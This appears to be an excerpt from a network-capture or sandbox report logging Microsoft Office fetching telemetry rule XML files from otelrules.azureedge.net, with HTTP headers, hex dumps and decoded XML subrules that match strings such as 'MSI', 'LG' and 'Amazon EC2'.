                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                            x-ms-request-id: 2044f02f-601e-0001-42eb-25faeb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bbnvkgdqtwd2nmyz8000000048g00000000c3pu
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            41192.168.2.44979413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:25 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                            x-ms-request-id: 2ee95feb-501e-0029-5d17-26d0b8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bb2cvg4m0cmab3ecw000000042g00000000b6ff
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            42192.168.2.44979613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:25 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                            x-ms-request-id: 389326c4-a01e-0053-299b-278603000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-r1755647c66trqwgqbys9wk81g00000003vg00000000fx71
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            43192.168.2.44979513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:25 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                            x-ms-request-id: e7cc90bd-401e-0029-032a-279b43000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bbh7l5skzh3rekksc00000006rg00000000bkxf
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:25 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            44192.168.2.44979713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:25 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:25 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                            x-ms-request-id: 2399187d-801e-008f-5f67-282c5d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181225Z-17fbfdc98bb8lw78ye6qppf97g00000005wg000000007agm
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            45192.168.2.44979813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:26 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                            x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-r1755647c66z67vn9nc21z11a800000004rg00000000d4yn
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            46192.168.2.44979913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:26 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                            x-ms-request-id: c417f1b6-b01e-0084-279b-27d736000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-17fbfdc98bbnsg5pw6rasm3q8s00000005vg000000003895
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            47192.168.2.44980013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:26 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                            x-ms-request-id: 174f78f2-a01e-0032-607a-281949000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-17fbfdc98bbl4n669ut4r27e08000000053000000000431m
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            48192.168.2.44980113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:26 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:26 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                            x-ms-request-id: b19a9190-b01e-00ab-7309-28dafd000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181226Z-17fbfdc98bb9xxzfyggrfrbqmw00000004k000000000g3fd
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:26 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            49192.168.2.44980313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:27 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:27 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                            x-ms-request-id: d145a723-401e-0067-13b1-2609c2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181227Z-17fbfdc98bbjwdgn5g1mr5hcxn00000003d0000000000g53
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:27 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
